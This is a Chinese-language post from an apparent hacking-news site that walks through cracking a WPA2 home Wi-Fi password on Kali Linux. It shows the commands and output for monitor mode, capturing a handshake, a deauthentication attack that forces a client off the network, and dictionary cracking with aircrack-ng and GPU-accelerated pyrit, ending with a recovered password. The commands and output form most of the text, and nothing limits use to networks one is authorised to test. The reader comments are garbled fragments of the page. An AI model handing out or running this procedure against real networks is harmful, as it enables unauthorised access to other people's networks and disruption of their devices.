kali无线破解实战示例

kali无线破解实战示例

入侵渗透hacker2016-09-05 10:20:119565A+A-

首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡

    root@kali:~# iwconfig 
    wlan1     IEEE 802.11bg  ESSID:off/any  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              
    eth0      no wireless extensions.
    lo        no wireless extensions.

查看无线网卡设备名

    root@kali:~# airmon-ng start wlan1
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID     Name
    2772    dhclient
    4415    wpa_supplicant
    Interface       Chipset         Driver
    wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                    (monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,copy下来BSSID

    root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0
     CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                       
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                       
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
     E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

当看到WPA handshake:说明抓到了握手包,就可以来破解

如果一直抓不到,可以用如下命令来攻击,强迫重新握手

    aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one

抓到握手包后,就可以用字典来跑密码了。

    root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
    Opening nenew-21.cap
    Read 18654 packets.
       #  BSSID              ESSID                     Encryption
       1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)
    Choosing first network as target.
    Opening nenew-21.cap
    Reading packets, please wait...

跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多

kali linux下装显卡驱动,sdk等,参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡,很快就跑出了密码

    root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    Parsing file 'nenew-21.cap' (1/1)...
    Parsed 14 packets (14 802.11-packets), got 1 AP(s)
    Tried 4420221 PMKs so far; 86496 PMKs per second.
    The password is 'qq123789'.


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 瑰颈皆叹2022-05-29 00:45:15
  • ons    #Data, #/s  CH  MB   ENC  CIPHER AUTH 
  • 语酌痞唇2022-05-29 04:03:51
  • in ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12        
  • 双笙迷麇2022-05-29 01:39:26
  • ; TP-LINK_5612                 
  • 拥嬉莺时2022-05-29 04:25:34
  • sp;                   &nbs
  • 边侣惘说2022-05-29 03:04:18
  • sp;                        &

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理